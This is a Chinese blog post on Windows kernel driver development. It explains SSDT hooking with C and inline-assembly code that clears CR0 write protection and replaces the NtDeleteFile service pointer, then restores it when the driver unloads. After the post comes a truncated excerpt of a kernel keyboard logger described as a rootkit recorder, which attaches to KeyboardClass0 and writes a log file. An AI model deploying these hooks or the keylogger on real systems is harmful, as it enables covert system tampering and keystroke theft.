内核驱动开发HOOK SSDT

本文详细介绍了HOOKSSDT技术的工作原理及其实现过程。通过修改KeServiceDescriptorTable中的函数指针来实现HOOK操作,并在驱动卸载时恢复原有函数指针。文章提供了具体的代码示例,包括HOOK函数、UNHOOK函数及自定义函数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

HOOK SSDT思路:

驱动加载时通过KeServiceDescriptorTable得到函数指针地址 -> 替换其地址为自定义函数地址

驱动卸载时恢复SSDT原来地址

代码部分:

对于KeServiceDescriptorTable的类型定义如下:

typedef struct _SERVICE_DESCRIPTOR_TABLE

{

PULONG ServiceTableBase; //指向系统服务函数地址表

PULONG ServiceCounterTableBase; 

ULONG NumberOfService; //服务函数的个数,NumberOfService*4 就是整个地址表的大小

ULONG ParamTableBase;

}SERVICE_DESCRIPTOR_TABLE,*PSERVICE_DESCRIPTOR_TABLE;

//KeServiceDescriptorTable为导出函数

 

extern "C" PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;

驱动入口函数:

extern "C" NTSTATUS DriverEntry ( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath ) 

{
NTSTATUS status; //定义驱动卸载函数  pDriverObject->DriverUnload = OnUnload; //调用HOOK Hook();
return STATUS_SUCCESS;

}

驱动卸载函数:

VOID OnUnload(IN PDRIVER_OBJECT pDriverObject) 

{

//调用恢复HOOK

Unhook();

}

HOOK函数:

VOID Hook()

{

  //得到内核函数在SSDT表中索引的地址,其中0x3E是服务ID号

  ULONG NtDeleteFileAddress = (ULONG)(KeServiceDescriptorTable->ServiceTableBase+0x3E);

  //在SSDT表中取到内核函数的地址,并保存以便卸载驱动的时候恢复

  OldNtDeleteFile = *(ULONG*)NtDeleteFileAddress ;

  __asm

  {

    //去掉内存保护

    cli mov eax,cr0

    and eax,not 10000h

    mov cr0,eax

  }

  //把我们自己函数写进SSDT表中索引位置 

  *(ULONG*)NtDeleteFileAddress = (ULONG)MyNtDeleteFile;

  __asm

  {

    //恢复内存保护 mov eax,cr0 or eax,10000h mov cr0,eax sti

  }

}

UNHOOK函数:

VOID Unhook()

{

   //得到内核函数在SSDT表中索引的地址

  ULONG NtDeleteFileAddress = (ULONG)(KeServiceDescriptorTable->ServiceTableBase+0x3E);

  __asm

  {

     cli mov eax,cr0

    and eax,not 10000h

    mov cr0,eax

   }

  //在SSDT表中索引的地址恢复系统内核函数

  *(ULONG*)NtDeleteFileAddress = (ULONG)OldNtDeleteFile;

  __asm{ mov eax,cr0 or eax,10000h mov cr0,eax sti }

}

//自定义函数

NTSTATUS MyNtDeleteFile( IN POBJECT_ATTRIBUTES ObjectAttributes)

{

  //函数内可做过滤,如放行则可调用原来函数

  return STATUS_SUCCESS;

}

 

转载于:https://www.cnblogs.com/ciangcic/p/3528230.html

C语言写的ROOT记录器,编译通过了.#include "stdafx.h" #include "ScanCode.h" #include "DriverEntry.h" #include <stdarg.h> const WCHAR *DEVICE_NAME = L"\\Device\\MonkeyKingDeviceName"; const WCHAR *SYMOBL_NAME = L"\\??\\MonkeyKingSymbolicName"; const char *NT_DEVICE_NAME = "\\Device\\KeyboardClass0"; const char *LOG_FILE_NAME = "\\DosDevices\\c:\\MonkeyKing.txt"; int numPendingIrps = 0; /*---------------------------------------------------------------------------------------------------------------------------------------------*/ /************************************************************************ * 函数名称:DriverEntry * 功能描述:初始化驱动程序,定位和申请硬件资源,创建内核对象 * 参数列表: pDriverObject:从I/O管理器中传进来的驱动对象 pRegistryPath:驱动程序在注册表的中的路径 * 返回 值:返回初始化驱动状态 *************************************************************************/ STDAPI_(NTSTATUS) DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegistryPath ) { NTSTATUS retValue = STATUS_SUCCESS; TRACEMSG("初始化例程..."); pDriverObject->DriverUnload = OnUnload; for (INT32 i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++){ pDriverObject->MajorFunction[i] = DispatchHandler; } pDriverObject->MajorFunction[IRP_MJ_READ] = DispatchRead; TRACEMSG("初始化例程...完成"); //创建设备。 TRACEMSG("创建设备..."); PDEVICE_OBJECT pKeyboardDevice = NULL; if (!NT_SUCCESS(retValue = CreateDevice(pDriverObject, &pKeyboardDevice))) { TRACEMSG("创建设备...失败"); return retValue; } TRACEMSG("创建设备...完成。键盘设备对象指针为:0x%x", pKeyboardDevice); //挂接设备。 TRACEMSG("挂接设备..."); if (!NT_SUCCESS(retValue = HookKeyboard(pKeyboardDevice))) { TRACEMSG("挂接设备...失败"); return retValue; } TRACEMSG("挂接设备...完成"); TRACEMSG("初始化线程..."); if (!NT_SUCCESS(retValue = InitThreadLogger(pDriverObject))) { TRACEMSG("初始化线程...失败"); return retValue; } TRACEMSG("初始化线程...完成");
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值